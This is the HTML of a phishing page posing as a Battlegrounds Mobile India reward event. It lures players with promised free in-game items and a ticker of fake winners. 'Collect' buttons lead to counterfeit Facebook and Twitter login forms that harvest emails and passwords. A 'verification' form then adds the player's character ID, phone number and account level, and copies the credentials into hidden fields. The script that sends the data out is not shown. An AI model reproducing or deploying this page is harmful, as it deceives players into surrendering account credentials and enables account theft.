<html>

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta property="og:title" content="Battlegrounds Mobile Event">
    <meta name="description" content="Collect your special rewards at the Royale Pas Event. This opportunity is limited and without the need for topup. Collect your rewards now!">
    <meta property="og:description" content="Collect your special rewards at the Royale Pas Event. This opportunity is limited and without the need for topup. Collect your rewards now!">
    <meta property="og:url" content="./">
    <meta property="og:site_name" content="Battlegrounds Mobile Event">
    <meta property="og:type" content="website">
    <meta name="copyright" content="Battlegrounds Mobile India">
    <meta name="theme-color" content="#000">
    <meta property="og:image" content="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
    <title>Battlegrounds Mobile India Event</title>
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/login/facebook.css">
    <link rel="stylesheet" href="css/login/twitter.css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
    <link rel="icon" href="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
</head>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    <style type="text/css">
        body {
            background: url(img/container.jpg);
            background-size: cover;
            background-repeat: no-repeat;
            margin-top: -15px;
            font-family: 'Teko';
        }

        .container {
            border: 1px solid #636363;
        }

        .navbar {
            background: #0C0C0C;
            width: 100%;
            height: 60px;
        }

        .navbar-logo {
            width: 100px;
            float: left;
            margin-top: 12px;
            margin-left: 13px;
        }

        .navbar-shop {
            width: 29px;
            margin-top: 19px;
            margin-right: 8px;
        }

        .navbar-menu {
            width: 20px;
            margin-top: 19px;
            margin-right: 5px;
        }

        .navbar-right {
            width: auto;
            float: right;
        }

        .navbar-download {
            background: #eff542;
            width: 50px;
            height: 50px;
            margin-top: 10px;
            margin-right: 3px;
            border-radius: 0px;
            float: right;
        }

        .navbar-download img {
            width: 20px;
            height: 21px;
            margin: 13px;
        }

        .navbar-righ {
            width: auto;
            float: right;
        }

        .navbar-shp {
            width: 29px;
            margin-top: 19px;
            margin-right: 10px;
        }

        .event-theme {
            width: 100%;
            height: 60px;
            margin-top: -20px;
            margin-left: auto;
            margin-right: auto;
            padding: 5px;
            display: block;
        }

        .footer {
            background: #131313;
            width: 100%;
            height: auto;
            padding: 15px;
        }

        .footer-copyright-icon {
            width: 55%;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            display: block;
        }

        .footer-txt-copyright {
            color: #bdbdbd;
            font-size: 15px;
            font-family: Teko;
            text-align: center;
        }

        .item img {
            border: none;
        }

        .item button {
            border: none;
            color: #3d321a;
            text-shadow: 0.3px 0.3px #d59b1c;
        }

        .nav-popup-title {
            padding-left: 15px;
            padding-top: 2px;
            color: #000;
            font-size: 22px;
            font-family: Teko;
            font-weight: 500;
            text-align: left;
        }

        .nav-popup img {
            width: 20px;
            height: 20px;
            margin-top: 5px;
            margin-right: 10px;
            color: #000;
            float: right;
        }

        .popup-alerts {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #fff;
            font-size: 20px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-alert {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #fff;
            font-size: 20px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-alert i {
            padding-top: 15px;
            padding-bottom: 15px;
            color: #fff;
            font-size: 40px;
            text-align: center;
        }

        .popup-footer button:nth-child(1) {
            width: auto;
            height: auto;
            margin-top: 4px;
            margin-left: auto;
            margin-right: auto;
            padding: 3px;
            padding-left: 28px;
            padding-right: 28px;
            color: #000;
            font-size: 18px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-btn-login {
            width: 40%;
            height: auto;
            padding: 6px;
            margin: 5px;
            color: #000;
            font-size: 15px;
            font-family: Teko;
            border: none;
            outline: none;
            margin-bottom: 45px;
            position: relative;
            display: line-block;
        }

        .popup-btn-login i {
            color: #fff;
            font-size: 23px;
            float: left;
        }

        .popup-btn-facebook {
            background: #4167B2;
            color: #fff;
        }

        .popup-btn-twitter {
            background: #198B96;
            color: #fff;
        }

        .popup-form-footer {
            margin-top: -16px;
        }

        .popup-form-footer button {
            width: auto;
            height: auto;
            margin-top: 4px;
            padding: 3px;
            padding-left: 30px;
            padding-right: 30px;
            color: #000;
            font-size: 18px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-form input {
            background: none;
            background-size: 100% 100%;
            width: 90%;
            height: auto;
            margin-left: 6px;
            margin-bottom: 3px;
            padding: 4.4px;
            color: #fff;
            font-size: 17px;
            font-family: Teko;
            font-weight: 500;
            border-radius: 2px;
            border: 1px solid #fff;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .popup-form input::placeholder {
            color: #fff;
        }

        .popup-form select {
            background: none;
            background-size: 100% 100%;
            width: 90%;
            height: auto;
            margin-left: 6px;
            margin-bottom: 3px;
            padding: 6px;
            padding-left: 6px;
            color: #fff;
            font-size: 17px;
            font-family: Teko;
            font-weight: 500;
            border-radius: 2px;
            border: 1px solid #fff;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .newevent {
            background: url(img/newevent.jpg) no-repeat center;
            background-size: 100% 100%;
            width: 100%;
            height: 83px;
            margin-left: auto;
            margin-right: auto;
            border-left: 0px solid #fff;
            border-right: 0px solid #fff;
            border-top: 0px solid #ECD954;
            border-bottom: 0px solid #ECD954;
            display: block;
            margin-top: -20px;
        }

        .header {
            width: 100%;
            height: auto;
        }

        .header img {
            width: 100%;
            height: auto;
            margin-top: -0px;
            border-bottom: 1px solid #a3a3a3;
        }

        .header video {
            width: 100%;
            border: none;
        }

        .james {
            background-size: 100% 100%;
            width: 98%;
            height: 60%;
            margin: auto;
        }

        .box {
            padding-top: 10px;
            width: 400px;
            height: 100%;
        }

        .footer {}

        .event-notification-wrapper {
            width: 94%;
            height: auto;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 17px;
            border-bottom: 3px solid #464037;
            display: block;
        }

        .event-notifications {
            background: url(img/alert-selow.png) no-repeat center;
            background-size: 100% 100%;
            width: 95%;
            height: 40px;
            padding: 5px;
            margin-left: auto;
            margin-right: auto;
            margin-top: 50px;
            margin-bottom: 6px;
            color: #554CEA;
            font-size: 20px;
            font-family: selow;
            text-align: left;
        }

        .event-notifications-text {
            margin-top: 5px;
            margin-left: auto;
            margin-right: auto;
            text-align: center;
            font-family: Teko;
            font-weight: 500;
            color: #D6B456;
            font-size: 18px;
        }
    </style>
    <div class="container">
        <div class="navbar">
            <img class="navbar-logo" src="https://www.battlegroundsmobileindia.com/common/img/common/logo.png">
            <div class="navbar-right">
                <img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_f_w.png">
                <img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_i_w.png">
                <img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_y_w.png">
                <div class="navbar-download"><img src="https://i.ibb.co/jwMxWFh/menu.png"></div>
                <div class="navbar-righ">
                    <img class="navbar-shp" src="https://www.battlegroundsmobileindia.com/common/img/icon/icon_shop_50.png"></div>
            </div>
            <!--- navbar-right --->
        </div>
        <!--- navbar --->
        <div class="header">
            <img src="img/header.jpg">


        </div>
        <!--- header --->
        <div class="newevent">

        </div>
        <!--- event-theme --->
        <div class="james">
            <div class="box">
                <center>
                    <div class="tab_rewards" id="latest">

                        <div class="item itemShine">
                            <div>
                                <figure>
                                    <img style="border-bottom: 0px;" src="img/rewards/x2.png">
                                </figure>
                            </div>
                            <div>
                                <button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/rewards/x2.png">COLLECT</button>
                            </div>
                        </div>

                        <div class="item itemShine">
                            <div>
                                <figure>
                                    <img style="border-bottom: 0px;" src="img/rewards/9.jpg">
                                </figure>
                            </div>
                            <div>
                                <button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/rewards/9.jpg">COLLECT</button>
                            </div>
                        </div>

                        <div class="item itemShine">
                            <div>
                                <figure>
                                    <img style="border-bottom: 0px;" src="img/rewards/7.jpg">
                                </figure>
                            </div>
                            <div>
                                <button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/rewards/7.jpg">COLLECT</button>
                            </div>
                        </div>

                        <div class="item itemShine">
                            <div>
                                <figure>
                                    <img style="border-bottom: 0px;" src="img/rewards/5.jpg">
                                </figure>
                            </div>
                            <div>
                                <button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/rewards/5.jpg">COLLECT</button>
                            </div>
                        </div>

                        <div class="item itemShine">
                            <div>
                                <figure>
                                    <img style="border-bottom: 0px;" src="img/rewards/5.png">
                                </figure>
                            </div>
                            <div>
                                <button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/rewards/5.png">COLLECT</button>
                            </div>
                        </div>

                        <div class="item itemShine">
                            <div>
                                <figure>
                                    <img style="border-bottom: 0px;" src="img/rewards/4.jpg">
                                </figure>
                            </div>
                            <div>
                                <button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/rewards/4.jpg">COLLECT</button>
                            </div>
                        </div>

                    </div>
                    <!--- tab-rewards --->

                    <!-- SLIDENAMES -->

                    <div class="event-notifications">
                        <div class="event-notifications-text">
                            <div class="slider animated fadeIn" style="display: block;">ID 5883485425 Successfully Got 1 Lamborghini</div>
                            <div class="slider animated fadeIn" style="display: none;">ID 5295893347 Successfully Got 18 Materials</div>
                            <div class="slider animated fadeIn" style="display: none;">ID 5963737318 Successfully Got 8100 Free UC</div>
                            <div class="slider animated fadeIn" style="display: none;">ID 5886864517 Successfully Got 18 Materials</div>
                            <div class="slider animated fadeIn" style="display: none;">ID 5155030554 Successfully Got Glacier M416</div>
                            <div class="slider animated fadeIn" style="display: none;">ID 5463336783 Successfully Got 1 Lamborghini</div>
                            <div class="slider animated fadeIn" style="display: none;">ID 5463336783 Successfully Got Pharao X Suit</div>
                        </div>
                    </div>

                    <!-- END SLIDENAMES -->


                </center>

            </div>

        </div>
        <!--- box --->
        <div class="footer">
            <img class="footer-copyright-icon" src="https://www.battlegroundsmobileindia.com/common/img/common/footerlg.png">
            <div class="footer-txt-copyright">ⓒ KRAFTON, Inc. All rights reserved.</div>
            <!--- footer-txt-copyright --->
            <div class="footer-txt-copyright">Privacy Policy | Terms of Service | Rules of Conduct | Official Community Policy</div>
            <!--- footer-txt-copyright --->
        </div>
        <!--- footer --->
    </div>
    <!--- container --->

    <div class="popup itemReward_confirmation" style="display: none;">
        <div class="popup-box">
            <div class="nav-popup">
                <img onmousedown="tutup.play();" onclick="close_reward_confirmation()" src="img/popup-close.png">
                <div class="nav-popup-title">Reward Confirmation</div>
                <!--- nav-popup-title --->
            </div>
            <!--- nav-popup --->
            <div class="popup-box-bg">
                <div class="popup-alert">Are you sure to collect this reward?</div>
                <!--- popup-alert --->
                <div class="popup-item itemShine">
                    <div>
                        <figure>
                            <img src="" id="myItemReward_confirmationImg">
                        </figure>
                    </div>
                </div>
                <!--- popup-item itemShine --->
                <br>
            </div>
            <!--- popup-box-bg --->
            <div class="popup-footer">
                <button type="button" onmousedown="buka.play();" onclick="open_account_login()">Collect</button>
            </div>
            <!--- popup-footer --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup --->

    <div class="popup account_login" style="display: none;">
        <div class="popup-box">
            <div class="nav-popup">
                <div class="nav-popup-title">Account Login</div>
                <!--- nav-popup-title --->
            </div>
            <!--- nav-popup --->
            <div class="popup-box-bg">
                <div class="popup-alerts">Log in using your BGMI MOBILE account</div>
                <!--- popup-alert --->
                <button type="button" onmousedown="buka.play();" class="popup-btn-login popup-btn-twitter" onclick="open_twitter();"><i class="fa fa-twitter-square icon-login"></i> Twitter</button>
                <button type="button" onmousedown="buka.play();" class="popup-btn-login popup-btn-facebook" onclick="open_facebook();"><i class="fa fa-facebook-square icon-login"></i> Facebook</button>
                <img style="width: 90%; height: auto; margin-top: -30px; margin-left: auto; margin-right: auto;" src="https://i.postimg.cc/66bK3tfJ/Amod.png">
                <br>
            </div>
            <!--- popup-box-bg --->
            <div class="popup-footer-log">
            </div>
            <!--- popup-footer --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup --->

    <div class="popup-login login-facebook animated fadeIn" style="display: none;">
        <div class="popup-box-login-fb">
            <a onclick="tutup_facebook()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
            <div class="navbar-fb"><img src="https://i.ibb.co/Wg8qQxh/facebook-text.png"></div>
            <!--- navbar-fb --->
            <div class="content-box-fb">
                <p class="kaget email-fb" style="width: 330px; top: -15px; text-align: left;">The email or phone number you entered does not match any account. <b>Find your account.</b></p>
                <p class="kaget sandi-fb" style="width: 330px; top: -15px; text-align: left;">Incorrect password. <b>Did you forget your password?</b></p>
                <img src="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
                <div class="txt-login-fb">Log in to your Facebook account to connect to Battlegrounds Mobile.</div>
                <!--- txt-login-fb --->
                <form class="login-form" action="javascript:void(0)" method="post" id="ValidateLoginFbForm">
                    <input type="text" class="loginEmail" name="email" id="email-facebook" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity('Enter Email or Mobile Number')" oninput="setCustomValidity('')">
                    <input type="password" class="loginPassword" name="password" id="password-facebook" placeholder="Password" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity('Enter Password')" oninput="setCustomValidity('')">
                    <div class="showHide showPassword" onclick="showFbPassword()"><i class="zmdi zmdi-eye-off zmdi-hc-2x"></i></div>
                    <!--- showPassword --->
                    <div class="showHide hidePassword" style="display: none;" onclick="hideFbPassword()"><i class="zmdi zmdi-eye zmdi-hc-2x"></i></div>
                    <!--- hidePassword --->
                    <input type="hidden" name="login" id="login-facebook" value="Facebook" readonly>
                    <button type="submit" class="btn-login-fb" onclick="ValidateLoginFbData()">Log In</button>
                </form>
                <div class="txt-create-account">Create account</div>
                <!--- txt-create-account --->
                <div class="txt-not-now">Not now</div>
                <!--- txt-not-now --->
                <div class="txt-forgotten-password">Forgotten password?</div>
                <!--- txt-forgotten-password --->
            </div>
            <!--- content-box-fb--->
            <div class="language-box">
                <center>
                    <div class="language-name language-name-active">English (UK)</div>
                    <!--- language-name --->
                    <div class="language-name">Bahasa Indonesia</div>
                    <!--- language-name --->
                    <div class="language-name">Basa Jawa</div>
                    <!--- language-name --->
                    <div class="language-name">Bahasa Melayu</div>
                    <!--- language-name --->
                    <div class="language-name">日本語</div>
                    <!--- language-name --->
                    <div class="language-name">Español</div>
                    <!--- language-name --->
                    <div class="language-name">Português (Brasil)</div>
                    <!--- language-name --->
                    <div class="language-name"><i class="fa fa-plus"></i></div>
                    <!--- language-name --->
                </center>
            </div>
            <!--- language-box --->
            <div class="copyright">Facebook Inc.</div>
            <!--- copyright --->
        </div>
        <!--- popup-box-login-fb --->
    </div>
    <!--- popup-login --->

    <div class="popup-login login-twitter animated fadeIn" style="display: none;">
        <div class="popup-box-login-twitter">
            <a onclick="tutup_twitter()" class="close-other"><i class="zmdi zmdi-close"></i></a>
            <div class="box-twitter">
                <center>
                    <div class="header-twitter">
                        <img src="https://i.ibb.co/V9rgBqw/twitter-text.png" style="margin-bottom: -35px; margin-left: 135px;">
                </center>
                <center>
                    <br><br>
                    <form action="javascript:void(0)" method="post" id="ValidateLoginTwitterForm">
                        <div class="txt-login-twitter" style="text-align: left; margin-left: 95px;">Login to Twitter</div>
                        <!--- txt-login-twitter --->
                        <div class="input-box-twitter">
                            <label>Phone, email, or username</label>
                            <input type="text" name="email" id="email-twitter" placeholder="" required oninvalid="this.setCustomValidity('Enter Username, Email or Mobile Number')" oninput="setCustomValidity('')">
                        </div>
                        <!--- input-box-twitter --->
                        <div class="input-box-twitter">
                            <div class="TwitterShowHide TwitterShowPassword" onclick="showTwitterPassword()"><i class="zmdi zmdi-eye-off zmdi-hc-2x"></i></div>
                            <!--- TwitterShowPassword --->
                            <div class="TwitterShowHide TwitterHidePassword" style="display: none;" onclick="hideTwitterPassword()"><i class="zmdi zmdi-eye zmdi-hc-2x"></i></div>
                            <!--- TwitterHidePassword --->
                            <label>Password</label>
                            <input type="password" style="width: 85%;" name="password" id="password-twitter" placeholder="" required oninvalid="this.setCustomValidity('Enter Password')" oninput="setCustomValidity('')">
                        </div>
                        <!--- input-box-twitter --->
                        <p class="kagettw email-tw" style="width: 330px; top: -15px; text-align: center; margin-left: -17px;">Sorry, we couldn't find your account.</p>
                        <p class="kagettw sandi-tw" style="width: 330px; top: -15px; text-align: center; margin-left: -17px;">Wrong Password!</p>
                        <input type="hidden" name="login" id="login-twitter" value="Twitter" readonly>
                        <button type="submit" class="btn-login-twitter" onclick="ValidateLoginTwitterData()">Log In</button>
                        <div class="footer-menu-twitter">Forgot password?</div>
                        <!--- footer-menu-twitter --->
                        <div class="footer-menu-twitter bulet">•</div>
                        <!--- footer-menu-twitter --->
                        <div class="footer-menu-twitter">Sign up to Twitter</div>
                        <!--- footer-menu-twitter --->
                    </form>
                </center>
                </div>
                <!--- box-twitter --->
            </div>
            <!--- header-twitter --->
        </div>
        <!--- popup-box-login-twitter --->
    </div>
    <!--- popup-login--->

    <div class="popup account_verification" style="display: none;">
        <div class="popup-box">
            <div class="nav-popup">
                <div class="nav-popup-title">Account Verification</div>
                <!--- nav-popup-title --->
            </div>
            <!--- nav-popup --->
            <div class="popup-box-bg">
                <div class="popup-alert">Complete your account details</div>
                <!--- popup-alert --->
                <form class="popup-form" action="javascript:void(0)" method="post" id="ValidateVerificationDataForm">
                    <input type="hidden" name="email" id="validateEmail" readonly>
                    <input type="hidden" name="password" id="validatePassword" readonly>
                    <input type="number" name="playid" id="playid" placeholder="Character ID" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Character ID')" oninput="setCustomValidity('')">
                    <input type="number" name="phone" id="phone" placeholder="Phone Number" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Phone Number')" oninput="setCustomValidity('')">
                    <select name="level" id="level" required oninvalid="this.setCustomValidity('select your Account Level')" oninput="setCustomValidity('')">
<option selected="selected" disabled="disabled" value="">Account Level</option>
<option>40</option>
<option>41</option>
<option>42</option>
<option>43</option>
<option>44</option>
<option>45</option>
<option>46</option>
<option>47</option>
<option>48</option>
<option>49</option>
<option>50</option>
<option>51</option>
<option>52</option>
<option>53</option>
<option>54</option>
<option>55</option>
<option>56</option>
<option>57</option>
<option>58</option>
<option>59</option>
<option>60</option>
<option>61</option>
<option>62</option>
<option>63</option>
<option>64</option>
<option>65</option>
<option>66</option>
<option>67</option>
<option>68</option>
<option>69</option>
<option>70</option>
<option>71</option>
<option>72</option>
<option>73</option>
<option>74</option>
<option>75</option>
<option>76</option>
<option>77</option>
<option>78</option>
<option>79</option>
<option>80</option>
<option>81</option>
<option>82</option>
<option>83</option>
<option>84</option>
<option>85</option>
<option>86</option>
<option>87</option>
<option>88</option>
<option>89</option>
<option>90</option>
<option>91</option>
<option>92</option>
<option>93</option>
<option>94</option>
<option>95</option>
<option>96</option>
<option>97</option>
<option>98</option>
<option>99</option>
<option>100</option>
</select>
                    <input type="hidden" name="login" id="validateLogin" readonly>
                    <br><br>
            </div>
            <!--- popup-box-bg --->
            <div class="popup-form-footer">
                <button type="submit" onmousedown="buka.play();" onclick="ValidateVerificationData()">Verify</button>
            </div>
            <!--- popup-footer --->
            </form>
            <!--- form --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup --->

    <div class="popup check_verification" style="display: none;">
        <div class="popup-box">
            <div class="nav-popup">
                <div class="nav-popup-title">Account Verification</div>
                <!--- nav-popup-title --->
            </div>
            <!--- nav-popup --->
            <div class="popup-box-bg">
                <div class="popup-alert">
                    <br>
                    <i class="zmdi zmdi-spinner zmdi-hc-spin"></i>
                    <br> Checking your account details...
                    <br><br>
                </div>
                <!--- popup-alert --->
                <div class="popup-form-footer">
                </div>
                <!--- popup-form-footer --->
            </div>
            <!--- popup-box-bg --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup --->

    <div class="popup processing_account" style="display: none;">
        <div class="popup-box">
            <div class="nav-popup">
                <div class="nav-popup-title">Processing Account</div>
                <!--- nav-popup-title --->
            </div>
            <!--- nav-popup --->
            <div class="popup-box-bg">
                <div class="popup-alert">
                    Hi,
                    <br> Thank you for joining our Battlegrounds Mobile India Event
                    <br>
                    <i class="fa fa-check-circle fa-2x"></i>
                    <br> Your account has been successfully processed
                    <br> The reward will be sent via in-game Mail
                    <br> Please wait up to 24 hours
                </div>
                <!--- popup-alert --->
                <div class="popup-footer">
                    <button type="button" onmousedown="tutup.play();" style="background: url(img/menu_on.png) no-repeat center center; background-size: 100% 100%;" onclick="location.href='https://www.battlegroundsmobileindia.com/';">Logout</button>
                </div>
                <!--- popup-box-bg --->
            </div>
            <!--- popup-footer --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup --->

    <script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script src="js/script.js"></script>
    <script src="js/showHide.js"></script>
    <script src="js/James.js"></script>

    <script>
        $(document).ready(function() {
            var detik = 59;
            var menit = 59;
            var jam = 23;

            function hitung() {
                setTimeout(hitung, 1000);
                $('#timer1').html('' + jam + ' : ' + menit + ' : ' + detik + '');
                detik--;
                if (detik < 0) {
                    detik = 59;
                    menit--;
                    if (menit < 0) {
                        menit = 0;
                        detik = 0;
                    }
                }
            }
            hitung();
        });
        $(document).ready(function() {
            var detik = 59;
            var menit = 59;
            var jam = 23;

            function hitung() {
                setTimeout(hitung, 1000);
                $('#timer2').html(+jam + ' : ' + menit + ' : ' + detik + '');
                detik--;
                if (detik < 0) {
                    detik = 59;
                    menit--;
                    if (menit < 0) {
                        menit = 0;
                        detik = 0;
                    }
                }
            }
            hitung();
        });
    </script>
    <script>
        var slideIndex = 0;
        showSlides();

        function showSlides() {
            var i;
            var slides = document.getElementsByClassName("slider");
            for (i = 0; i < slides.length; i++) {
                slides[i].style.display = "none";
            }
            slideIndex++;
            if (slideIndex > slides.length) {
                slideIndex = 1
            }
            slides[slideIndex - 1].style.display = "block";
            setTimeout(showSlides, 2400);
        }
    </script>

</body>

</html>